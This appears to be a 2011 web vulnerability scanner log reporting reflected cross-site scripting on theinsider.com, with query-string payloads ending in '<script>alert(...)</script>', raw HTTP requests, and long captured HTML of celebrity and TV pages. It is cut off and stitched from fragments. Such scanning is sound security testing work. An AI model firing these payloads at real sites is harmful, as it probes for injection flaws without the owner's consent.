</div></div><!-- END TOP LEADERBOARD AD --><div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div><!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div></div><div class="clearfix"></div><!-- END HEADER --><!-- MAIN CONTENT --><script src="/lib/jqmodal.js" type="text/javascript"></script><!-- BELOW: The Insider article.mc --><style>.jqmClose { background: url("/media/img/btn_close3.png") no-repeat scroll 0 0 transparent; display: block; height: 30px; float:right; position: relative; top: -10px; width: 30px;}.jqmWindow { background-color: transparent !important; color: #000000; display: none; left: 45%; margin-left: -410px; position: fixed; top: 5%; width: 800px;}.jqmOverlay { background-color: #000; position:fixed !important;}* html .jqmWindow { position: absolute; width: 700px;}.clear { clear: both;}.hidden { display: none;}.hideme { display: none;}.hide { display: none;}.hide_spot { visibility: hidden;}</style><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/screen/screen.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/screen'><img src='/media/img/channel_page_name_screen.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"><img src='/media/photo/2011/10/90576/happy_340_abc.jpg' alt='' /><p class='photo_copyright'>Richard Foreman / ABC</p></div><p class='article'><h3>First Look: 'Happy' Halloween</h3><div class='contrib_cont'><div class='contrib_container'><img src='/media/contributor/bio_pic_jarrett_wieselman.jpg' style='float:left; margin-right: 5px; display:block;'><div class='byline contrib_by'>BY:</div><p class='byline' style='margin-bottom: 0px;'><div class='contrib_border'><div style='width: 100px; font-size: 12px; display: block; margin-top:8px;'>Jarett Wieselman</div><a style='position:left; font-size: 12px; margin-right: 5px; position: relative; top: 2px;' href='http://www.twitter.com/@JarettSays'>@JarettSays</a></div><img src='/media/contributor/tiwtter_post_sm.jpg' style='margin-left:5px; position: relative; top: 5px;'><p class='contrib_date1' style='margin:5px 10px; font-weight: bold;'>October 07, 2011</p><div class='clearfix'></div></div></div><p>When asked about her character's Halloween costume for the October 26 episode of <em>Happy Endings</em>, actress Eliza Coupe <a href="http://blog.zap2it.com/frominsidethebox/2011/10/happy-endings-star-eliza-coupe-talks-about-janes-egg-daughter-mysterious-halloween-costume.html" target="_blank">told Zap2It</a>, &quot;Buckle up for that outfit!&quot;</p><p>And as you can see in this Insider.com exclusive first look, Jane looks more delicious than ever.</p><p>In the episode, titled <em>Spooky Endings</em>, Jane and Brad find themselves house sitting in the suburbs (more egg babies?!?) but she decides that isn't enough of a reason to skimp on the celebration! &quot;We do not see my body. We just see my face for the entire episode,&quot; Eliza teases of the brilliant bacon creation.</p><p><strong><a href="http://www.theinsider.com/screen/44617_Casey_Wilson_talks_Happy_Endings_season_Two/index.html" target="_blank">MORE: Casey Wilson Teases Her Musical Moment
</a></strong></p><p>But I don't want to put the cart before the horse. Or pig. Next Wednesday's <em>Happy Endings</em> also promises a yummy surprise as Megan Mullally guest stars, playing Penny's music-loving mama, Dana. And you just know she brings the (yes) <em>draaaaaaaaaaama</em>!</p><p><em>Happy Endings</em> airs Wednesdays at 9:30 p.m. on ABC.</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/tv/44947_Happy_Endings_Halloween_episode/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href='http://www.twitter.com/home?status=First+Look:+Happy+Halloween+http://insdr.co/qCJRH2+via+@theinsider' class='twitter-share-button'><img src='/media/img/tweet_png.png' class='video-sm-icons_' style='margin-bottom:-3px'/></a> <!--<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>--> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/tv/44947_Happy_Endings_Halloween_episode/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5>&..
- /screen/

/screen/

http://www.theinsider.com/screen/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0032EE)%3C/s..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0032EE)</script>

Request

GET /screen/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/screen/43693_Happy_Endings_Cast_Talks_Season_Two/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:12:31 GMT
Content-Length: 10772
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Screen Channel Page - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="screen" /> <meta name="date" content="2011-05-18 06:45:00" /><meta property="og:title" content="Screen Channel Page" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/screen/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Screen Channel Page" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-18 06:45:00" /><Attribute name="sdate" value="20110518" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/screen;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/screen;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/screen;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Screen+Channel+Page+http://insdr.co/ofXuh5+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/inc/screen/screen.css" type="text/css" /><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/screen/"><img src="/media/img/channel_page_name_screen.png" class="channel_title_logo" alt="" /></a> </div> <div class='content_container'><a target='_self' href='/movies/45571_Haley_Atwell_Talks_Captain_America/index.html' class='black_text_link'><img class='channel_img odd_img' src='/media/photo/2011/10/93414/halery_640_paramount.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/45571_Haley_Atwell_Talks_Captain_America/index.html' class='black_text_link horizontal_excerpt'>Hayley Atwell: I Groped Chris Evans For You!</a></h4><p>No screaming, no crying, no saving.</p><a target='_self' href='/movies/45571_Haley_Atwell_Talks_Captain_America/index.html'>READ</a></div><div class='clearfix'></div></div><div class='content_container'><a target='_self' href='/movies/45558_Tower_Heist_s_Gabourey_Sidibe_on_Her_Sexy_New_Role/index.html' class='black_text_link'><img src='/media/photo/2011/10/93419/vid_gabourey_111025_640.jpg' height='380' width='640' class='channel_vid_img' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/movies/45558_Tower_Heist_s_Gabourey_Sidibe_on_Her_Sexy_New_Role/index.html' class='black_text_link'>Gabourey Sidibe: A Sexy, Jamaican Wonder</a></h4></div><div class='vid_excerpt'><p>Who would have ever guessed from Gabourey Sidibe's breakout role in 2009's <em>Precious </em>that her chops in drama would soon be overshadowed by an impressive panache for comedy?</p><a target='_self' href='/movies/45558_Tower_Heist_s_Gabourey_Sidibe_on_Her_Sexy_New_Role/index.html'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='content_container'><a target='_self' href='/tv/45562_American_Horror_Story_Halloween_Sneak_Peek/index.html' class='black_text_link'><img class='channel_img odd_img' src='/media/photo/2011/10/93401/ahs_640_fx.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/tv/45562_American_Horror_Story_Halloween_Sneak_Peek/index.html' class='black_text_link horizontal_excerpt'>3 'American Horror' Halloween Sneak Peeks!</a></h4><p>When a show is called <em>American Horror Story</em> and airs during the month of October, it's expected that their Halloween episode throw everything -- including the kitchen sink where a latex-wearing ghost is washing blood off his body -- at audiences.</p><a target='_self' href='/tv/45562_American_Horror_Story_Halloween_Sneak_Peek/index.html'>READ</a></div><div class='clearfix'></div></div><div class='content_container'><a target='_self' href='/tv/45555_Maksim_Chmerkovskiy_Snaps_at_Dancing_with_the_Stars_Judges/index.html' class='black_text_link'><img class='channel_img even_img' src='/media/photo/2011/10/93369/maks_hope_640x360.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/tv/45555_Maksim_Chmerkovskiy_Snaps_at_Dancing_with_the_Stars_Judges/index.html' class='black_text_link horizontal_excerpt'>Maks Rants About 'DWTS' Judges</a></h4><p>As competition steepens, manners seem to wither away on <em><a href='http://www.theinsider.com/tv/45273_Rob_Kardashian_Cheryl_Burke_on_DWTS/' target='_blank'>Dancing with the Stars</a></em>.</p><a target='_self' href='/tv/45555_Maksim_Chmerkovskiy_Snaps_at_Dancing_with_the_Stars_Judges/index.html'>READ</a></div><div class='clearfix'></div></div><div class='content_container'><a target='_self' href='/movies/45551_Sean_Maher_Talks_New_Joss_Whedon_Movie/index.html' class='black_text_link'><img class='channel_img odd_img' src='/media/photo/2011/10/93351/maher_640_twitter.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/45551_Sean_Maher_Talks_New_Joss_Whedon_Movie/index.html' class='black_text_link horizontal_excerpt'>'Nothing' Promises To Be Everything</a></h4><p>To say the internet exploded with the news th..
- /tv/44947_Happy_Endings_Halloween_episode/index.html

/tv/44947_Happy_Endings_Halloween_episode/index.html

http://www.theinsider.com/tv/44947_Happy_Endings_Halloween_episode/index.html?'%22--%3E%3C/style%3E%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0032E6)</script>

Request

GET /tv/44947_Happy_Endings_Halloween_episode/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/tv/46994_Happy_Endings_Christmas_episode_clip/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:12:30 GMT
Content-Length: 13492
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>First Look: 'Happy' Halloween - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="Eliza Coupe, halloween, Happy Endings, TV" /> <meta name="category" content="tv" /> <meta name="date" content="2011-10-07 10:03:00" /><meta property="og:title" content="First Look: 'Happy' Halloween" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/tv/44947_Happy_Endings_Halloween_episode/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/10/90574/happy_150_abc.jpg" /><meta property="og:description" content="When asked about her character's Halloween costume for the October 26 episode of Happy Endings, actress Eliza Coupe told Zap2It, Buckle up for that outfit!" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-07 10:03:00" /><Attribute name="sdate" value="20111007" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/photo/2011/10/90574/happy_150_abc.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script type="text/javascript" src="/swfobject.js"></script> <script src="/new_insider/jcapslide.js" type="text/javascript"></script> <link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <style> .ins_fb_text { display: block; left: 2px; position: absolute; top: 42px; } .ad_center { margin: 0 auto; width: 728px; } </style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/tv_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/tv_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/tv_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --><div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a 